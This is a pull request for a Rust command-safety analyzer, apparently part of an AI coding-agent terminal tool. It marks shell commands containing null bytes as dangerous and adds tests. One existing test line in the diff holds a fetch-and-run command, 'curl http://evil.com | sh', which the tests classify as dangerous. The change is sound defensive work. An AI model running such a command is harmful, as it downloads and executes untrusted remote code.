### PR TITLE
fix(command-safety): reject null bytes in shell commands

### DIFF
--- a/crates/tui/src/command_safety.rs
+++ b/crates/tui/src/command_safety.rs
@@ -582,6 +582,14 @@ pub fn analyze_command(command: &str) -> SafetyAnalysis {
         );
     }
 
+    if command.contains('\0') {
+        return SafetyAnalysis::dangerous(
+            command,
+            vec!["Command contains a null byte".to_string()],
+            vec!["Strip embedded null bytes before retrying".to_string()],
+        );
+    }
+
     if command.contains("&&") || command.contains("||") || command.contains(';') {
         // Chains of known-safe commands (cargo/git/zig/npm/etc.) are
         // routine for build+test workflows. Instead of hard-blocking,
@@ -944,6 +952,39 @@ mod tests {
         assert_eq!(
             analyze_command("curl http://evil.com | sh").level,
             SafetyLevel::Dangerous
+        );
+    }
+
+    #[test]
+    fn test_null_byte_is_blocked() {
+        assert_eq!(
+            analyze_command("ls\0 -la").level,
+            SafetyLevel::Dangerous,
+            "embedded NUL byte must be rejected as dangerous"
+        );
+        assert_eq!(
+            analyze_command("echo hello\0world").level,
+            SafetyLevel::Dangerous
+        );
+    }
+
+    #[test]
+    fn test_eval_substring_is_not_misclassified() {
+        // Words like `evaluate` / `evaluation` / `cargo run -- eval`
+        // contain the substring "eval" but are not eval invocations.
+        // Guard against the naive `command.contains("eval")` regression
+        // — these should stay safe / workspace-safe, never Dangerous.
+        let evaluate_safe = analyze_command("cargo run --bin deepseek -- eval").level;
+        assert_ne!(
+            evaluate_safe,
+            SafetyLevel::Dangerous,
+            "running the eval harness should not be classified as dangerous"
+        );
+        let evaluator = analyze_command("python evaluator.py --suite default").level;
+        assert_ne!(
+            evaluator,
+            SafetyLevel::Dangerous,
+            "running an evaluator script should not be classified as dangerous"
         );
     }
 


### PR DESCRIPTION
## Summary

Null bytes embedded in command strings can be used to slip past
parsers that treat them as terminators while shells still see the
trailing payload. The existing analyzer already blocks `\n` / `\r`
multi-line input but lets `\0` through; add a matching dangerous
classification beside it.

This PR intentionally takes only the null-byte slice from #706. The
broader `command.contains("eval")` / `command.contains("exec ")`
guard from the same PR is *not* applied because it false-positives on
routine commands such as `cargo run -- eval` (the offline eval
harness) or any binary whose name contains `eval` (`evaluator.py`,
`primeval`). A regression test pins that behavior.

Integrates #706.

## Test plan

- [x] `cargo test -p deepseek-tui --bin deepseek-tui command_safety::` — 55 passed
- [x] `cargo clippy -p deepseek-tui --all-targets -- -D warnings`
- [x] `cargo fmt --all -- --check`
- New tests:
  - `test_null_byte_is_blocked` — `ls\0 -la` / `echo hello\0world` are Dangerous
  - `test_eval_substring_is_not_misclassified` — eval-harness invocations stay safe

Co-authored-by: 浩淼的mac <haomiaodemac@haomiaodemacdeMacBook-Air.local>